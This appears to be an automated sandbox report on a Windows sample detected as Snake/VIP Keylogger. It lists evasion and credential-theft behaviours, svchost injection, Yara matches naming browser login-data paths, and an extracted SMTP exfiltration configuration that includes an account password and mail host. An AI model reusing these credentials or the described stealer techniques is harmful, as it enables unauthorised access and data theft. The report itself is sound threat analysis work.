Edit tour

Windows Analysis Report
lsc5QN46NH.exe

Overview

General Information

Sample name:	lsc5QN46NH.exe renamed because original name is a hash value
Original sample name:	6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7.exe
Analysis ID:	1588171
MD5:	7a6425553456c5f24bb5c8e235574c72
SHA1:	6d825e1a1238c4a4f26966c281507e5e704c5500
SHA256:	6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

lsc5QN46NH.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\lsc5QN46NH.exe" MD5: 7A6425553456C5F24BB5C8E235574C72)

svchost.exe (PID: 6012 cmdline: "C:\Users\user\Desktop\lsc5QN46NH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35751:$a1: get_encryptedPassword 0x35725:$a2: get_encryptedUsername 0x357e9:$a3: get_timePasswordChanged 0x35701:$a4: get_passwordField 0x35767:$a5: set_encryptedPassword 0x35534:$a7: get_logins 0x30e72:$a10: KeyLoggerEventArgs 0x30e41:$a11: KeyLoggerEventArgsEventHandler 0x35608:$a13: _encryptedPassword
00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 6012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 6012	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: svchost.exe PID: 6012	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 6012	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2606ac:$a1: get_encryptedPassword 0x279b38:$a1: get_encryptedPassword 0x2a589b:$a1: get_encryptedPassword 0x2e1ea0:$a1: get_encryptedPassword 0x260680:$a2: get_encryptedUsername 0x279b0c:$a2: get_encryptedUsername 0x2a586f:$a2: get_encryptedUsername 0x2e1e74:$a2: get_encryptedUsername 0x260744:$a3: get_timePasswordChanged 0x279bd0:$a3: get_timePasswordChanged 0x2a5933:$a3: get_timePasswordChanged 0x2e1f38:$a3: get_timePasswordChanged 0x26065c:$a4: get_passwordField 0x279ae8:$a4: get_passwordField 0x2a584b:$a4: get_passwordField 0x2e1e50:$a4: get_passwordField 0x2606c2:$a5: set_encryptedPassword 0x279b4e:$a5: set_encryptedPassword 0x2a58b1:$a5: set_encryptedPassword 0x2e1eb6:$a5: set_encryptedPassword 0x260498:$a7: get_logins
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.svchost.exe.7c00f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7c00f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7c00f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7c00f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7c00f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7c00f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.7c00000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7c00000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7c00000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7c00000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.2.svchost.exe.7c00000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7c00000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
2.3.svchost.exe.326b000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326b000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.326b000.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326b000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326b000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.3.svchost.exe.326b000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326b000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x332cf:$s1: UnHook 0x3326b:$s2: SetHook 0x332a4:$s3: CallNextHook 0x33233:$s4: _hook
2.2.svchost.exe.7c00000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7c00000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7c00000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7c00000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7c00000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35743:$a1: get_encryptedPassword 0x35717:$a2: get_encryptedUsername 0x357db:$a3: get_timePasswordChanged 0x356f3:$a4: get_passwordField 0x35759:$a5: set_encryptedPassword 0x35526:$a7: get_logins 0x30e64:$a10: KeyLoggerEventArgs 0x30e33:$a11: KeyLoggerEventArgsEventHandler 0x355fa:$a13: _encryptedPassword
2.2.svchost.exe.7c00000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f496:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3eb39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ed96:$a4: \Orbitum\User Data\Default\Login Data 0x3f775:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7ca0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7ca0000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.7ca0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7ca0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7ca0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.7ca0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7ca0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.3.svchost.exe.326bf20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326bf20.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.326bf20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326bf20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326bf20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326bf20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326bf20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326bf20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.3.svchost.exe.326bf20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.3.svchost.exe.326b000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.326b000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.326b000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.326b000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.3.svchost.exe.326b000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.326bf20.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
